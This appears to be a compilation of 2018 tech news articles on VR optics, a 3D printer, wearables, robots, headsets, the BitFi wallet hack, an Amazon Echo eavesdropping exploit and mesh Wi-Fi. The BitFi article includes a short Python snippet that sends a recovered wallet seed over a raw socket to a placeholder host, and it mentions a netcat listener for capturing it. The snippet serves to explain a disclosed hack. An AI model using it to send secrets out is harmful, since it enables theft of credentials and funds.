VR optics could help old folks keep the world in focus

The complex optics involved with putting a screen an inch away from the eye in VR headsets could make for smart glasses that correct for vision problems. These prototype “autofocals” from Stanford researchers use depth sensing and gaze tracking to bring the world into focus when someone lacks the ability to do it on their own.

I talked with lead researcher Nitish Padmanaban at SIGGRAPH in Vancouver, where he and the others on his team were showing off the latest version of the system. It’s meant, he explained, to be a better solution to the problem of presbyopia, which is basically when your eyes refuse to focus on close-up objects. It happens to millions of people as they age, even people with otherwise excellent vision.

There are, of course, bifocals and progressive lenses that bend light in such a way as to bring such objects into focus — purely optical solutions, and cheap as well, but inflexible, offering only a small “viewport” through which to view the world. There are adjustable-lens glasses too, but they must be adjusted slowly and manually with a dial on the side. What if you could make the whole lens change shape automatically, depending on the user’s need, in real time?

That’s what Padmanaban and colleagues Robert Konrad and Gordon Wetzstein are working on, and although the current prototype is obviously far too bulky and limited for actual deployment, the concept seems totally sound.

Padmanaban previously worked in VR, and mentioned what’s called the convergence-accommodation problem. Basically, the way that we see changes in real life when we move and refocus our eyes from far to near doesn’t happen properly (if at all) in VR, and that can produce pain and nausea. Having lenses that automatically adjust based on where you’re looking would be useful there — and indeed some VR developers were showing off just that only 10 feet away. But it could also apply to people who are unable to focus on nearby objects in the real world, Padmanaban thought.

It works like this. A depth sensor on the glasses collects a basic view of the scene in front of the person: a newspaper is 14 inches away, a table three feet away, the rest of the room considerably more. Then an eye-tracking system checks where the user is currently looking and cross-references that with the depth map.

Having been equipped with the specifics of the user’s vision problem, for instance that they have trouble focusing on objects closer than 20 inches away, the apparatus can then make an intelligent decision as to whether and how to adjust the lenses of the glasses.

In the case above, if the user is looking at the table or the rest of the room, the glasses will assume whatever normal correction the person requires to see — perhaps none. But if they shift their gaze to focus on the paper, the glasses immediately adjust the lenses (perhaps independently per eye) to bring that object into focus in a way that doesn’t strain the person’s eyes.
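For the curious, the logic boils down to something like the following sketch — a loose Python illustration, not the team’s actual code, with every name (the depth-map lookup, the tunable-lens interface, the 0.5-meter near limit) invented for the example:

```python
# Loose sketch of the autofocal decision loop described above.
# depth_map.depth_at, set_power and the 0.5 m near limit are all invented
# for illustration; they are not the Stanford prototype's API.

NEAR_LIMIT_M = 0.5  # e.g. a wearer who can't focus on anything closer than ~20 inches


def required_add_diopters(distance_m: float, near_limit_m: float = NEAR_LIMIT_M) -> float:
    """Extra lens power (in diopters) needed to focus at distance_m.

    Objects beyond the wearer's near limit need no extra help; closer objects
    need the difference in optical power (1/distance) between the object and
    the near limit.
    """
    if distance_m >= near_limit_m:
        return 0.0
    return 1.0 / distance_m - 1.0 / near_limit_m


def update_lenses(depth_map, gaze_xy, left_lens, right_lens):
    # 1. Where is the user looking, and how far away is that object?
    distance_m = depth_map.depth_at(gaze_xy)       # hypothetical lookup
    # 2. Decide whether and how much to adjust, then drive the lenses
    #    (the real system can adjust each eye independently).
    add_power = required_add_diopters(distance_m)
    left_lens.set_power(add_power)                  # hypothetical actuator call
    right_lens.set_power(add_power)
```

Under those assumptions, a newspaper 14 inches (about 0.36 m) away works out to roughly 0.8 diopters of extra power for a wearer with a 20-inch near limit.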

The whole process of checking the gaze, determining the depth of the selected object and adjusting the lenses takes a total of about 150 milliseconds. That’s long enough that the user might notice it happening, but redirecting and refocusing one’s gaze takes perhaps three or four times that long — so the change in the device will be complete by the time the user’s eyes would normally be at rest again.

“Even with an early prototype, the Autofocals are comparable to and sometimes better than traditional correction,” reads a short summary of the research published for SIGGRAPH. “Furthermore, the ‘natural’ operation of the Autofocals makes them usable on first wear.”

The team is currently conducting tests to measure more quantitatively the improvements derived from this system, and test for any possible ill effects, glitches or other complaints. They’re a long way from commercialization, but Padmanaban suggested that some manufacturers are already looking into this type of method and despite its early stage, it’s highly promising. We can expect to hear more from them when the full paper is published.

XYZPrinting announces the da Vinci Color Mini

XYZprinting may have finally cracked the color 3D printing code. Its latest machine, the $1,599 da Vinci Color Mini, is a full-color printer that uses three CMY ink cartridges to stain the filament as it is extruded, allowing for up to 15 million color combinations.

The printer is currently available for pre-order on Indiegogo for $999.

The printer can build objects 5.1″ x 5.1″ x 5.1″ in size and it can print PLA or PETG. A small ink cartridge stains the 3D Color-inkjet PLA as it comes out, creating truly colorful objects.

“Desktop full-color 3D printing is here. Now, consumers can purchase an easy-to-operate, affordable, compact full-color 3D printer for $30,000 less than market rate. This is revolutionary because we are giving the public access to technology that was once only available to industry professionals,” said Simon Shen, CEO of XYZprinting.

The new system is aimed at educational and home markets and, at less than $1,000, it hits a unique and important sweet spot in terms of price. While the prints aren’t perfect, being able to print in full color for the price of a nicer single-color 3D printer is pretty impressive.

Fitbit’s upcoming Charge 3 to sport full touchscreen, per leak

This appears to be the Fitbit Charge 3 and, if it is, several big changes are in the works for Fitbit’s premier fitness tracker band.

The leak comes from Android Authority, which points to several changes. First, the device has a full touchscreen rather than a clunky quasi-touchscreen like the Charge 2. From the touchscreen, users can navigate the device and even reply to notifications and messages. Second, the Charge 3 will be swim-proof to 50 meters. Finally, and this is a bad one, the Charge 3 will not have built-in GPS, meaning users will have to bring a smartphone along for a run if they want GPS data.

Price and availability were not revealed, but chances are the device will hit stores in the coming weeks, ahead of the holidays.

This is a big change for Fitbit. If the above leak is correct on all points, Fitbit is pushing the Charge 3 into smartwatch territory. Dropping GPS is regrettable, but the company probably has data showing that only a minority of wearers use the feature. With a full touchscreen and a notification-reply function, the Charge 3 is gaining a lot of functionality for its size.

This robot maintains tender, unnerving eye contact

Humans already find it unnerving enough when extremely alien-looking robots are kicked and interfered with, so one can only imagine how much worse it will be when they make unbroken eye contact and mirror your expressions while you heap abuse on them. This is the future we have selected.

The Simulative Emotional Expression Robot, or SEER, was on display at SIGGRAPH here in Vancouver, and it’s definitely an experience. The robot, a creation of Takayuki Todo, is a small humanoid head and neck that responds to the nearest person by making eye contact and imitating their expression.

It doesn’t sound like much, but it’s pretty complex to execute well, which, despite a few glitches, SEER managed to do.

At present it alternates between two modes: imitative and eye contact. Both, of course, rely on a nearby (or, one can imagine, built-in) camera that recognizes and tracks the features of your face in real time.

In imitative mode the positions of the viewer’s eyebrows and eyelids, and the position of their head, are mirrored by SEER. It’s not perfect — it occasionally freaks out or vibrates because of noisy face data — but when it worked it managed rather a good version of what I was giving it. Real humans are more expressive, naturally, but this little face with its creepily realistic eyes plunged deeply into the uncanny valley and nearly climbed the far side.
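If you’re wondering what imitating an expression involves under the hood, it’s roughly a loop like the sketch below — my own loose reconstruction in Python, not Todo’s code, with the face-tracking source and servo interface both stand-ins:

```python
# Rough sketch of "imitative mode": map tracked facial features onto the
# robot's actuators each frame. get_face_features() and Servo are hypothetical
# stand-ins; SEER's real pipeline is not public here.
import time


def clamp(value, lo, hi):
    return max(lo, min(hi, value))


class Servo:
    """Hypothetical actuator that accepts an angle in degrees."""
    def __init__(self, name):
        self.name = name

    def move_to(self, angle_deg):
        print(f"{self.name} -> {angle_deg:.1f} deg")


def mirror_loop(get_face_features, servos, smoothing=0.8):
    """Mirror the viewer's brow, eyelid and head pose onto the robot.

    The exponential smoothing is the kind of thing that keeps noisy
    face-tracking data from making the head "vibrate".
    """
    state = {name: 0.0 for name in servos}
    while True:
        features = get_face_features()               # e.g. {"brow": 0.3, "head_yaw": -0.1}
        for name, servo in servos.items():
            target = features.get(name, 0.0) * 30.0  # normalized [-1, 1] -> degrees
            state[name] = smoothing * state[name] + (1 - smoothing) * target
            servo.move_to(clamp(state[name], -30.0, 30.0))
        time.sleep(1 / 30)                           # ~30 updates per second
```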

Eye contact mode has the robot moving on its own while, as you might guess, making uninterrupted eye contact with whoever is nearest. It’s a bit creepy, but not in the way that some robots are — when you’re looked at by inadequately modeled faces, it just feels like bad VFX. In this case it was more the surprising amount of empathy you suddenly feel for this little machine.

That’s largely due to the delicate, childlike, neutral sculpting of the face and highly realistic eyes. If an Amazon Echo had those eyes, you’d never forget it was listening to everything you say. You might even tell it your problems.

This is just an art project for now, but the tech behind it is definitely the kind of thing you can expect to be integrated with virtual assistants and the like in the near future. Whether that’s a good thing or a bad one I guess we’ll find out together.

“Unhackable” BitFi crypto wallet has been hacked

The BitFi crypto wallet was supposed to be unhackable and none other than famous weirdo John McAfee claimed that the device – essentially an Android-based mini tablet – would withstand any attack. Spoiler alert: it couldn’t.

First, a bit of background. The $120 device launched at the beginning of this month to much fanfare. McAfee claimed it contained no software or storage and was instead a standalone wallet similar to the Trezor. The website featured a bold claim by McAfee himself, one that would give a normal security researcher pause.

Further, the company offered a bug bounty, one that outside researchers seem to be slowly eroding. They asked hackers to pull coins off a specially prepared $10 wallet, a move that is uncommon in the world of bug bounties. They wrote:

1. We deposit coins into a Bitfi wallet
2. If you wish to participate in the bounty program, you will purchase a Bitfi wallet that is preloaded with coins for just an additional $10 (the reason for the charge is because we need to ensure serious inquiries only)
3. If you successfully extract the coins and empty the wallet, this would be considered a successful hack
4. You can then keep the coins and Bitfi will make a payment to you of $250,000
5. Please note that we grant anyone who participates in this bounty permission to use all possible attack vectors, including our servers, nodes, and our infrastructure

Hackers began attacking the device immediately, eventually hacking it to find the passphrase used to move crypto in and out of the wallet. In a detailed set of tweets, security researchers Andrew Tierney and Alan Woodward began finding holes by attacking the operating system itself. However, this did not match the bounty terms to the letter, BitFi claimed, even though the company had not actually shipped any bounty-ready devices.

Then, to add insult to injury, the company earned a Pwnie Award at the security conference DefCon, given for worst vendor response. As hackers began dismantling the device, BitFi went on the defensive, consistently claiming that its device was secure. And the hackers had a field day. One hacker, 15-year-old Saleem Rashid, was able to play Doom on the device.

The hacks kept coming. McAfee, for his part, kept refusing to accept the hacks as genuine.

Unfortunately, the latest hack may have just fulfilled all of BitFi’s requirements. Rashid and Tierney have been able to pull funds out of the wallet by extracting the passphrase, a primary requirement for the bounty. “We have sent the seed and phrase from the device to another server, it just gets sent using netcat, nothing fancy,” Tierney said. “We believe all conditions have been met.”
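For a sense of how little “nothing fancy” means here, exfiltrating a recovered seed amounts to writing a string to a raw TCP socket. The Python below illustrates the idea only — it is not the researchers’ tooling, and the host and port are placeholders:

```python
# Illustration only: pushing a recovered string over a plain TCP connection,
# the same idea as piping it through netcat. Host and port are placeholders.
import socket


def send_string(payload: str, host: str = "192.0.2.10", port: int = 4444) -> None:
    """Open a plain TCP connection and write the payload; no protocol, no encryption."""
    with socket.create_connection((host, port)) as conn:
        conn.sendall(payload.encode("utf-8"))
```

On the receiving end, a netcat listener (or any matching socket server) on that port is enough to capture it.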

The end state of this crypto mess? BitFi did what most hacked crypto companies do: double down on the threats. In a since-deleted tweet, the company made it clear that it was not to be messed with.

The researchers, however, may still have the last laugh.

StarVR’s One headset flaunts eye-tracking and a double-wide field of view

While the field of VR headsets used to be more or less limited to Oculus and Vive, numerous competitors have sprung up as the technology has matured — and some are out to beat the market leaders at their own game. StarVR’s latest headset brings eye-tracking and a seriously expanded field of view to the game, and the latter especially is a treat to experience.

The company announced the new hardware at SIGGRAPH in Vancouver, where I got to go hands-on and eyes-in with the headset. Before you get too excited, though, keep in mind this set is meant for commercial applications — car showrooms, aircraft simulators, and so on. That means it’s going to be expensive and won’t offer as polished a user experience as consumer-focused sets.

That said, the improvements present in the StarVR One are significant and immediately obvious. Most important is probably the expanded FOV — 210 degrees horizontal and 130 vertical. That’s nearly twice the 110-degree horizontal FOV of the most popular headsets, and believe me, it makes a difference. (I haven’t tried the Pimax 8K, which has a similarly wide FOV.)

On Vive and Oculus sets I always had the feeling that I was looking through a hole into the VR world — a large hole, to be sure, but having your peripheral vision be essentially blank made it a bit claustrophobic.

In the StarVR headset, I felt like the virtual environment was actually around me, not just in front of me. I moved my eyes around much more rather than turning my head, with no worries about accidentally gazing at the fuzzy edge of the display. A 90 Hz refresh rate meant things were nice and smooth.

To throw shade at competitors, the demo I played (I was a giant cyber-ape defending a tower) could switch between the full FOV and a simulation of the 110-degree one found in other headsets. I suspect it was slightly exaggerated, but the difference really is clear.

It’s reasonably light and comfortable — though no VR headset really is either — and it doesn’t feel as chunky as it looks.

The resolution of the custom AMOLED display is supposedly 5K. But the company declined to specify the actual resolution when I asked. They did, however, proudly proclaim full RGB pixels and 16 million sub-pixels. Let’s do the math:

16 million divided by 3 makes around 5.3 million full pixels. 5K isn’t a real standard, just shorthand for having around 5,000 horizontal pixels between the two displays. Divide 5.3 million by that and you get 1060. Rounding those off to semi-known numbers gives us 2560 pixels (per eye) for the horizontal and 1080 for the vertical resolution.
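Spelled out as a quick script, using only the figures StarVR provided (so the outputs are estimates, not confirmed specs):

```python
# The back-of-the-envelope estimate above, spelled out. Inputs are StarVR's
# own figures (16 million sub-pixels, full RGB, "5K" shorthand); everything
# derived from them is an estimate, not a confirmed spec.
subpixels = 16_000_000
full_pixels = subpixels / 3                  # full RGB pixels: ~5.3 million
horizontal_total = 5_000                     # "5K": roughly 5,000 px across both eyes
rows = full_pixels / horizontal_total        # ~1,067 rows (rounded to ~1,060 above)
per_eye_width = horizontal_total / 2         # ~2,500 px per eye, near the familiar 2,560
print(f"{full_pixels:,.0f} pixels, ~{rows:.0f} rows, ~{per_eye_width:.0f} px per eye")
```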

That doesn’t fit the approximately 16:10 ratio of the field of view, but who knows? Let’s not get too bogged down in unknowns. Resolution isn’t everything — but generally, the more pixels the better.

The other major new inclusion is an eye-tracking system provided by Tobii. We knew eye-tracking in VR was coming; it was demonstrated at CES, and the Fove Kickstarter showed it was at least conceivable to integrate into a headset now-ish.

Unfortunately the demos of eye-tracking were pretty limited (think a heatmap of where you looked on a car) so, being hungry, I skipped them. The promise is good enough for now — eye tracking allows for all kinds of things, including a “foveated rendering” that focuses display power where you’re looking. This too was not being shown, however, and it strikes me that it is likely phenomenally difficult to pull off well — so it may be a while before we see a good demo of it.

One small but welcome improvement that eye-tracking also enables is automatic detection of interpupillary distance, or IPD — it’s different for everyone and can be important to rendering the image correctly. One less thing to worry about.
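In practice, detecting IPD amounts to measuring the distance between the two tracked pupil centers — a toy example below, with made-up coordinates rather than anything from Tobii’s actual API:

```python
# Toy example of what "automatic IPD detection" boils down to: the distance
# between the two tracked pupil centers. The coordinates are made up; a real
# eye tracker reports them in its own calibrated space.
import math


def ipd_mm(left_pupil_mm, right_pupil_mm):
    """Euclidean distance between pupil centers, in millimeters."""
    return math.dist(left_pupil_mm, right_pupil_mm)


print(ipd_mm((-31.5, 0.0, 0.0), (31.5, 0.0, 0.0)))  # -> 63.0 mm, a typical adult IPD
```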

The StarVR One is compatible with SteamVR tracking, or you can get the XT version and build your own optical tracking rig — that’s for the commercial providers for whom it’s an option.

Although this headset will be going to high-end commercial types, you can bet that the wide FOV and eye tracking in it will be standard in the next generation of consumer devices. Having tried most of the other headsets, I can say with certainty that I wouldn’t want to go back to some of them after having experienced this one. VR is still a long way off from convincing me it’s worthwhile, but major improvements like these definitely help.

This bipedal robot has a flying head

Making a bipedal robot is hard. You have to maintain exquisite balance at all times and, even with the amazing things Atlas can do, there is still a chance that your crazy robot will fall over and bop its electronic head. But what if that head is a quadcopter?

Researchers at the University of Tokyo have done just that with their wild Aerial-Biped. The robot isn’t truly bipedal; instead, it’s designed to give the appearance of bipedal walking without the tricky business of actually balancing on two legs. Think of these legs as more a sort of fun bit of puppetry that mimics walking but doesn’t really walk.

“The goal is to develop a robot that has the ability to display the appearance of bipedal walking with dynamic mobility, and to provide a new visual experience. The robot enables walking motion with very slender legs like those of a flamingo without impairing dynamic mobility. This approach enables casual users to choreograph biped robot walking without expertise. In addition, it is much cheaper compared to a conventional bipedal walking robot,” the team told IEEE.

The robot is similar to the bizarre-looking Ballu, a blimp robot with a floating head and spindly legs. The new robot learned how to walk convincingly through machine learning, a feat that gives it a realistic gait even though it is really an aerial system. It’s definitely a clever little project and could be interesting at a theme park or in an environment where a massive bipedal robot falling over on someone might be discouraged.

This happy robot helps kids with autism

A little bot named QTrobot from LuxAI could be the link between therapists, parents, and autistic children. The robot, which features an LCD face and robotic arms, allows kids who are overwhelmed by human contact to become more comfortable in a therapeutic setting.

The project comes from LuxAI, a spin-off of the University of Luxembourg. They will present their findings at the RO-MAN 2018 conference at the end of this month.

“The robot has the ability to create a triangular interaction between the human therapist, the robot, and the child,” co-founder Aida Nazarikhorram told IEEE. “Immediately the child starts interacting with the educator or therapist to ask questions about the robot or give feedback about its behavior.”

The robot reduces anxiety in autistic children and the researchers saw many behaviors – hand flapping, for example – slow down with the robot in the mix.

Interestingly, the robot is a better choice for children than an app or tablet. Because the robot is “embodied,” the researchers found that it draws attention and improves learning, especially when compared to a standard iPad/educational-app pairing. In other words, children play with tablets and work with robots.

The robot is entirely self-contained and easily programmable. It can run for hours at a time and includes a 3D camera and full processor.

The researchers found that the robot doesn’t become the focus of the therapy but instead helps the therapist connect with the patient. This, obviously, is an excellent outcome for an excellent (and cute) little piece of technology.

Security researchers found a way to hack into the Amazon Echo

Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug.

The hack involved a modified Amazon Echo, which had had parts swapped out, including some that had been soldered on. The modified Echo was then used to hack into other, non-modified Echos by connecting both the hackers’ Echo and a regular Echo to the same LAN.

This allowed the hackers to turn their own, modified Echo into a listening bug, relaying audio from the other Echo speakers without those speakers indicating that they were transmitting.

This method was very difficult to execute, but represents an early step in exploiting Amazon’s increasingly popular smart speaker.

The researchers notified Amazon of the exploit before the presentation, and Amazon has already pushed a patch, according to Wired.

Still, the presentation demonstrates how one Echo with malicious firmware could potentially compromise a group of speakers connected to the same network, raising concerns about the idea of Echos in hotels.

Wired explained how the networking feature of the Echo allowed for the hack:

If they can then get that doctored Echo onto the same Wi-Fi network as a target device, the hackers can take advantage of a software component of Amazon’s speakers, known as Whole Home Audio Daemon, that the devices use to communicate with other Echoes in the same network. That daemon contained a vulnerability that the hackers found they could exploit via their hacked Echo to gain full control over the target speaker, including the ability to make the Echo play any sound they chose, or more worryingly, silently record and transmit audio to a faraway spy.

An Amazon spokesperson told Wired that “customers do not need to take any action as their devices have been automatically updated with security fixes,” adding that “this issue would have required a malicious actor to have physical access to a device and the ability to modify the device hardware.”

To be clear, the actor would only need physical access to their own Echo to execute the hack.

While Amazon has dismissed concerns that its voice activated devices are monitoring you, hackers at this year’s DefCon proved that they can.

Samsung turns to Plume for new mesh Wifi product line

Samsung today is announcing an updated version of its Wifi product line. The company partnered with Palo Alto-based Plume Design to provide software that powers the devices. According to Samsung, Plume’s platform uses artificial intelligence to allocate bandwidth across connected devices while delivering the best possible wifi coverage throughout a home. Plus, by using Plume, Samsung gets to say its Wifi system uses AI, which is a big marketing win.

The system also includes a SmartThings Hub, like the previous generation, allowing owners to build a connected IoT home without having to buy another box.

“Integrating our adaptive home Wi-Fi technology and a rich set of consumer features into SmartThings’ large, open ecosystem truly elevates the smart home experience,” said Fahri Diner, co-founder and CEO of Plume, in a statement. “Samsung gives you myriad devices to consume content and connect, and Plume ensures that your Wi-Fi network delivers a superior user experience to all of those devices.”

Plume Design was founded in 2014 and was one of the first to offer a consumer-facing mesh network product line. Since then, though, nearly every home networking company has followed suit and Plume has been forced to find new ways to make use of its technology. In June 2017, Comcast invested in Plume and later launched xFi using Plume technology to power the mesh networking product. According to Comcast at the time of xFi’s nationwide launch, Comcast licensed the Plume technology, then reconfigured some aspects of it to integrate xFi. It also designed its own pods in-house — which sounds similar to what Samsung is doing here too.

Plume Design has to date raised $42.2M over three rounds of funding.

Samsung’s new SmartThings WiFi Mesh Router is priced competitively with comparable products. A three-pack of the units costs $279, while a single unit is $119.